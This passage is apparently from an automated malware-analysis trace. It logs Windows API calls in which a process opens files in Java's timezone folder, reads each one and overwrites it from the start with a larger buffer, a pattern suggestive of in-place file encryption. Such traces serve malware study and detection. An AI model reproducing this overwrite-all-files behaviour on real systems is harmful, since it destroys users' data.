lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0129.344] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0129.345] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0129.345] ReleaseMutex (hMutex=0x168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guadeloupe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guadeloupe", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guadeloupe", lpUsedDefaultChar=0x0) returned 10 [0129.345] ReadFile (in: hFile=0x1d4, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0129.346] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0129.346] WriteFile (in: hFile=0x1d4, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0129.346] CloseHandle (hObject=0x1d4) returned 1 [0129.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Knox" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\knox"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0130.652] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0130.652] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x518 [0130.652] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0130.652] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.652] ReleaseMutex (hMutex=0x168) returned 1 [0130.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Knox", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0130.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Knox", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Knox", lpUsedDefaultChar=0x0) returned 4 [0130.652] ReadFile (in: hFile=0x20c, lpBuffer=0x1f3ee68, nNumberOfBytesToRead=0x518, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3ee68*, lpNumberOfBytesRead=0x2e9f2bc*=0x518, lpOverlapped=0x0) returned 1 [0131.489] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0131.490] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xaa0, lpOverlapped=0x0) returned 1 [0131.490] CloseHandle (hObject=0x20c) returned 1 [0131.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Iqaluit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\iqaluit"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.518] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0131.518] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x428 [0131.519] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0131.519] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.519] ReleaseMutex (hMutex=0x168) returned 1 [0131.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Iqaluit", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.519] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Iqaluit", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Iqaluit", lpUsedDefaultChar=0x0) returned 7 [0131.519] ReadFile (in: hFile=0x20c, lpBuffer=0x269c668, nNumberOfBytesToRead=0x428, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2e9f2bc*=0x428, lpOverlapped=0x0) returned 1 [0131.567] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0131.567] WriteFile (in: hFile=0x20c, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x9b0, lpOverlapped=0x0) returned 1 [0131.567] CloseHandle (hObject=0x20c) returned 1 [0131.568] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Maceio" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0135.744] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.745] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x189 [0135.745] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.745] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.745] ReleaseMutex (hMutex=0x168) returned 1 [0135.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maceio", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Maceio", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Maceio", lpUsedDefaultChar=0x0) returned 6 [0135.745] ReadFile (in: hFile=0x208, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x189, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x189, lpOverlapped=0x0) returned 1 [0135.806] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0135.806] WriteFile (in: hFile=0x208, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x711, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x711, lpOverlapped=0x0) returned 1 [0135.807] CloseHandle (hObject=0x208) returned 1 [0135.807] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0135.808] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.808] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x149 [0135.808] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.808] ReleaseMutex (hMutex=0x168) returned 1 [0135.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Metlakatla", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Metlakatla", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Metlakatla", lpUsedDefaultChar=0x0) returned 10 [0135.808] ReadFile (in: hFile=0x208, lpBuffer=0x268b7c8, nNumberOfBytesToRead=0x149, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268b7c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x149, lpOverlapped=0x0) returned 1 [0135.809] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0135.809] WriteFile (in: hFile=0x208, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6d1, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6d1, lpOverlapped=0x0) returned 1 [0135.810] CloseHandle (hObject=0x208) returned 1 [0135.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0135.811] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.811] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x504 [0135.811] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.811] ReleaseMutex (hMutex=0x168) returned 1 [0135.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nassau", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0135.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Nassau", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Nassau", lpUsedDefaultChar=0x0) returned 6 [0135.875] ReadFile (in: hFile=0x208, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x504, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2e9f2bc*=0x504, lpOverlapped=0x0) returned 1 [0135.962] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0135.962] WriteFile (in: hFile=0x208, lpBuffer=0x28741b8*, nNumberOfBytesToWrite=0xa8c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28741b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa8c, lpOverlapped=0x0) returned 1 [0135.962] CloseHandle (hObject=0x208) returned 1 [0135.962] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Ojinaga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\ojinaga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0135.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x330 [0135.963] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0135.963] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0135.963] ReleaseMutex (hMutex=0x168) returned 1 [0135.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ojinaga", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0135.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ojinaga", cchWideChar=7, lpMultiByteStr=0x1f7acfc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ojinaga", lpUsedDefaultChar=0x0) returned 7 [0135.963] ReadFile (in: hFile=0x208, lpBuffer=0x1e967d8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x330, lpOverlapped=0x0) returned 1 [0136.002] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.002] WriteFile (in: hFile=0x208, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8b8, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x8b8, lpOverlapped=0x0) returned 1 [0136.002] CloseHandle (hObject=0x208) returned 1 [0136.002] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.003] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.003] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d [0136.003] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.003] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.003] ReleaseMutex (hMutex=0x168) returned 1 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Puerto_Rico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Puerto_Rico", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Puerto_Rico", lpUsedDefaultChar=0x0) returned 11 [0136.003] ReadFile (in: hFile=0x208, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0136.004] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.004] WriteFile (in: hFile=0x208, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0136.004] CloseHandle (hObject=0x208) returned 1 [0136.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.006] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.006] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4fc [0136.006] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.006] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.006] ReleaseMutex (hMutex=0x168) returned 1 [0136.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santa_Isabel", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0136.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Santa_Isabel", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Santa_Isabel", lpUsedDefaultChar=0x0) returned 12 [0136.006] ReadFile (in: hFile=0x208, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4fc, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x2e9f2bc*=0x4fc, lpOverlapped=0x0) returned 1 [0136.037] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.037] WriteFile (in: hFile=0x208, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xa84, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa84, lpOverlapped=0x0) returned 1 [0136.037] CloseHandle (hObject=0x208) returned 1 [0136.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\St_Lucia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\st_lucia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.038] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.038] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x41 [0136.038] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.038] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.038] ReleaseMutex (hMutex=0x168) returned 1 [0136.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Lucia", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="St_Lucia", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="St_Lucia", lpUsedDefaultChar=0x0) returned 8 [0136.039] ReadFile (in: hFile=0x208, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x2e9f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.040] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.040] WriteFile (in: hFile=0x208, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.040] CloseHandle (hObject=0x208) returned 1 [0136.041] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Toronto" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\toronto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0136.041] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.041] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x788 [0136.041] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0136.042] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.042] ReleaseMutex (hMutex=0x168) returned 1 [0136.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Toronto", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Toronto", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toronto", lpUsedDefaultChar=0x0) returned 7 [0136.042] ReadFile (in: hFile=0x208, lpBuffer=0x288f968, nNumberOfBytesToRead=0x788, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesRead=0x2e9f2bc*=0x788, lpOverlapped=0x0) returned 1 [0136.174] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0136.174] WriteFile (in: hFile=0x208, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f2d0*=0xd10, lpOverlapped=0x0) returned 1 [0136.174] CloseHandle (hObject=0x208) returned 1 [0136.175] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Davis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\davis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 